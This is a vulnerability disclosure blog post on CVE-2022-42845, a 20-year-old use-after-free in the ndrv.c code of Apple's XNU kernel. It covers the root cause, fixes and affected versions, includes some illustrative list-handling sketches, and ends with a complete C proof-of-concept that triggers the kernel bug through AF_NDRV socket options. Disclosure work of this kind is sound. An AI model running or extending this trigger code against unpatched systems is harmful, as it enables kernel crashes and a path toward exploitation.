Adam Doupé

Associate Professor, Arizona State University
Director, Center for Cybersecurity and Trusted Foundations

CVE-2022-42845: 20-Year-Old XNU Use After Free Vulnerability in ndrv.c


I’ve been on a sabbatical this academic year, and my goal is to understand the state of the art in exploitation and vulnerability analysis by doing it myself, which I expanded on previously.

This post describes the first vulnerability that I found in XNU, the kernel at the core of the operating systems on a number of Apple products: Macs, iPhones, iPads, lots of i-devices really.

The vulnerability is a 20-year-old use-after-free in ndrv.c that a root user can trigger by creating an AF_NDRV socket. I learned a ton through identifying the root cause, studying the fix, and creating a proof-of-concept that triggers the vulnerability. And it was quite cool to see my name on the security notes.

Root Cause

An attacker with root privileges can create a dangling pointer in the nd_multiaddrs linked list: an entry is freed but never unlinked from the list.

In ndrv.c:ndrv_do_remove_multicast, the following code walks the nd_multiaddrs linked list to unlink the entry ndrv_entry and then frees it:

      /* Find the old entry */
      ndrv_entry = ndrv_have_multicast(np, multi_addr);

      // ...

      // Remove from our linked list
      struct ndrv_multiaddr*  cur = np->nd_multiaddrs;

      ifmaddr_release(ndrv_entry->ifma);

      if (cur == ndrv_entry) {
          np->nd_multiaddrs = cur->next;
      } else {
          for (cur = cur->next; cur != NULL; cur = cur->next) { // adamd: Vulnerability
              if (cur->next == ndrv_entry) {
                  cur->next = cur->next->next;
                  break;
              }
          }
      }

      // ...

              ndrv_multiaddr_free(ndrv_entry, ndrv_entry->addr->sa_len);

Now consider the following linked list of struct ndrv_multiaddr entries:

A -> B -> NULL

Where A is nd_multiaddrs (the head of the list) and B is ndrv_entry (the entry that we are deleting).

The initializer of the for loop sets cur to cur->next, and the if condition inside the loop compares cur->next to ndrv_entry in order to unlink ndrv_entry from the list.

In our example, the initializer sets cur = B, so the first (and only) comparison is B->next == B, that is, NULL == B. The if condition never triggers, cur advances to NULL, and the loop exits without unlinking anything.

Thus, even though B is freed after this loop (in the call to ndrv_multiaddr_free), the nd_multiaddrs linked list in our example still looks like:

A -> B -> NULL

The conditions for triggering this vulnerability are that there must be at least two elements on the nd_multiaddrs list, and the element being removed must be the second one in the list.
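To make the walkthrough concrete, here is a minimal userspace sketch of the same unlink logic. It is not kernel code: `struct node`, `buggy_unlink`, and `is_linked` are hypothetical stand-ins invented for illustration, and nothing is freed, so it is safe to run.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical stand-in for struct ndrv_multiaddr: only the link matters. */
struct node {
    struct node *next;
};

/*
 * Mirrors the vulnerable unlink logic from ndrv_do_remove_multicast.
 * Returns true if `entry` was actually unlinked from the list.
 */
static bool buggy_unlink(struct node **head, struct node *entry)
{
    /* The kernel only gets here after finding the entry, so the list is non-empty. */
    assert(head != NULL && *head != NULL);

    struct node *cur = *head;

    if (cur == entry) {
        *head = cur->next;
        return true;
    }
    /* Bug: the scan starts at head->next, so head->next is never compared to entry. */
    for (cur = cur->next; cur != NULL; cur = cur->next) {
        if (cur->next == entry) {
            cur->next = cur->next->next;
            return true;
        }
    }
    return false;
}

/* Returns true if `entry` is still reachable from `head`. */
static bool is_linked(const struct node *head, const struct node *entry)
{
    for (; head != NULL; head = head->next) {
        if (head == entry) {
            return true;
        }
    }
    return false;
}
```

With a list A -> B -> C, calling `buggy_unlink(&head, &B)` returns false and `is_linked(head, &B)` stays true, while removing A or C works as expected. In the kernel, B would then be freed while still reachable from the list.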

Real Root Cause

One of the things that I love about discovering vulnerabilities is trying to put myself in the shoes of the developer to understand why the bug occurred.

I can completely relate to the developer here: it took me a while of walking through the code to even believe that there was a vulnerability.

At first glance, everything looks fine.

The other aspect to consider is the set of conditions required to trigger the bug. An off-by-one error (which is essentially what this is) would usually be caught by the developer during normal testing, because the system wouldn’t do what it was supposed to do.

However, this condition does not trigger in the case of one element in the list, and only occurs if you delete a specific item in a list that has more than one item.

Therefore, I can completely relate to the developer making this mistake and not noticing this bug.

My Proposed Fix

A fix for the vulnerability is to not advance the cur pointer before entering the loop:

      for (; cur != NULL; cur = cur->next) {
          if (cur->next == ndrv_entry) {
              cur->next = cur->next->next;
              break;
          }
      }
  }
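As a sanity check on this proposed change, here is a small userspace sketch that applies it to a plain singly linked list. The names `struct node`, `fixed_unlink`, and `list_length` are hypothetical and exist only for this illustration; the NULL guards at the top are an addition for the standalone version and are not part of the kernel snippet.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical stand-in for struct ndrv_multiaddr. */
struct node {
    struct node *next;
};

/* Unlink logic with the proposed fix: the scan starts at the head itself. */
static bool fixed_unlink(struct node **head, struct node *entry)
{
    assert(head != NULL);

    struct node *cur = *head;

    /* Guards added for the standalone sketch. */
    if (cur == NULL || entry == NULL) {
        return false;
    }
    if (cur == entry) {
        *head = cur->next;
        return true;
    }
    /* cur begins at the head, so head->next is now compared against entry. */
    for (; cur != NULL; cur = cur->next) {
        if (cur->next == entry) {
            cur->next = cur->next->next;
            return true;
        }
    }
    return false;
}

/* Counts the nodes reachable from `head`. */
static size_t list_length(const struct node *head)
{
    size_t n = 0;
    for (; head != NULL; head = head->next) {
        n++;
    }
    return n;
}
```

On a list A -> B -> C, `fixed_unlink(&head, &B)` now returns true and leaves A -> C, which is the case the original loop skipped.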

The Real Fix

Looking at the patched version, it seems that something similar was done, with the deletion logic abstracted into a function ndrv_cb_remove_multiaddr:

ndrv_cb_remove_multiaddr(struct ndrv_cb *np, struct ndrv_multiaddr *ndrv_entry)
{
  struct ndrv_multiaddr   *cur = np->nd_multiaddrs;
  bool                    removed = false;

  if (cur == ndrv_entry) {
      /* we were the head */
      np->nd_multiaddrs = cur->next;
      removed = true;
  } else {
      /* find our entry */
      struct ndrv_multiaddr  *cur_next = NULL;

      for (; cur != NULL; cur = cur_next) {
          cur_next = cur->next;
          if (cur_next == ndrv_entry) {
              cur->next = cur_next->next;
              removed = true;
              break;
          }
      }
  }
  ASSERT(removed);
}

It is fascinating to learn how the developers fix these underlying bugs. While the bug itself was fixed, I notice two interesting additions here:

  1. Abstracting the functionality of removing a ndrv_multiaddr into a single function ndrv_cb_remove_multiaddr. In addition to being good software development practice, doing so helps prevent future bugs, because developers have a single function to call to delete a ndrv_multiaddr rather than doing it themselves (and introducing another bug).

  2. The developers also added an ASSERT(removed); at the end of the function. This is important because it essentially encodes the security requirement of the function into the ASSERT statement: the entry must actually have been unlinked. If future developers change functionality here, it is unlikely that the bug will be reintroduced (although it might not be clear to future developers why a function that attempts to remove from a linked list should never fail, so perhaps they would remove the ASSERT).
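For comparison, the two ideas above (one removal helper, plus an assertion that removal succeeded) can also be sketched with a pointer-to-pointer walk, which removes the head special case where the off-by-one crept in. This is a different idiom from Apple's patch, not a description of it, and `struct node` and `unlink_entry` are hypothetical names; the standard `assert` stands in for the kernel's ASSERT.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical stand-in for struct ndrv_multiaddr. */
struct node {
    struct node *next;
};

/*
 * Unlinks `entry` from the list rooted at `*head`.
 * `link` always points at the pointer that refers to the current node,
 * so the head and interior nodes are handled by the same code path.
 */
static void unlink_entry(struct node **head, struct node *entry)
{
    struct node **link = head;
    bool removed = false;

    while (*link != NULL) {
        if (*link == entry) {
            *link = entry->next;   /* bypass the entry */
            removed = true;
            break;
        }
        link = &(*link)->next;
    }

    /* Postcondition: the caller is about to free entry, so it must be off the list. */
    assert(removed);
    (void)removed;                 /* silences unused warnings when NDEBUG is set */
}
```

The trade-off is readability: the double pointer is less familiar to some readers, but there is only one comparison site, so there is no second branch that can drift out of sync with the first.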

Affected Versions

From what I can tell, the vulnerable code was introduced in XNU 344 and shipped with Mac OS X Jaguar (10.2). The bug has been present since ~2002, which makes this a 20-year-old bug!

First commit: https://github.com/apple-oss-distributions/xnu/blob/fad439e77835295998e796a2547c75c42f4bc623/bsd/net/ndrv.c#L1054

POC

Here’s the POC that I wrote to trigger this bug. After freeing the entry, it closes the socket, which calls ndrv_do_detach and then ndrv_remove_all_multicast, which dereferences the dangling object:

#include <stddef.h>
#include <stdint.h>   /* uint8_t, used by struct sockaddr_generic */
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>

/*

  Author: Adam Doupe (adamd)
  POC for CVE-2022-42845: a kernel use-after-free vulnerability in ndrv.c in XNU.
  Writeup: https://adamdoupe.com/blog/2022/12/13/cve-2022-42845-xnu-use-after-free-vulnerability-in-ndrv-dot-c/  

*/


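/*
  The names are borrowed TCP constants; only the values matter.
  On an AF_NDRV socket with level 0, option 5 adds a multicast address and
  option 6 removes one (these appear to correspond to NDRV_ADDMULTICAST and
  NDRV_DELMULTICAST in net/ndrv.h).
*/
#define TCPOPT_SACK 5
#define TCPOLEN_CC 6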

struct sockaddr_generic {
  uint8_t sa_len;
  uint8_t sa_family;
};

int main()
{
   int sockfd = socket(AF_NDRV, SOCK_RAW, IPPROTO_IP);
   if (sockfd == -1)
   {
      perror("socket");
      return -1;
   }

   char* sa_data = "lo0";
   struct sockaddr_generic sag_s = {
      .sa_len = (sizeof(struct sockaddr_generic) + strlen(sa_data) + 1),
      .sa_family = AF_NS,
   };

   char* sockaddr = (char*) malloc(sag_s.sa_len);
   memcpy(sockaddr, &sag_s, sizeof(struct sockaddr_generic));
   memcpy(sockaddr + sizeof(struct sockaddr_generic), sa_data, strlen(sa_data) + 1);

   char* sockaddr_real = "\x05\x00\x6c\x6f\x30";
   int size = 5;
   int result = bind(sockfd, (struct sockaddr*)sockaddr_real, size);

   if (result != 0)
   {
      perror("bind");
      return -1;
   }

   // Add B to `nd_multiaddrs`

   char val[] = "\010\000\000\000\000\000\000\000";
   int val_size = 8;
   result = setsockopt(sockfd, 0, TCPOPT_SACK, val, val_size);
   if (result != 0)
   {
      perror("setsockopt");
      return -1;
   }

   // Add A to `nd_multiaddrs` (which becomes the head)

   char val_2[] = "\010\000\000\374\377\000\000\000";
   int val_2_size = 8;
   result = setsockopt(sockfd, 0, TCPOPT_SACK, val_2, val_2_size);
   if (result != 0)
   {
      perror("setsockopt");
      return -1;
   }

   // Delete B
   result = setsockopt(sockfd, 0, TCPOLEN_CC, val, val_size);
   if (result != 0)
   {
      perror("setsockopt");
      return -1;
   }

   // At this point B is freed, so we can call multiple functions to exploit

   // closing the socket will call `ndrv_do_detach` and then `ndrv_remove_all_multicast`, which will crash referencing the deallocated B
   close(sockfd);
}

Vulnerability Discovery

I’m not going to say much publicly at the moment as to how I found this vulnerability, because I’m still using it to find bugs.

I’ll release everything toward the end of my sabbatical, but for now it suffices to say that fuzzing techniques are amazing for finding these types of tricky corner-cases.
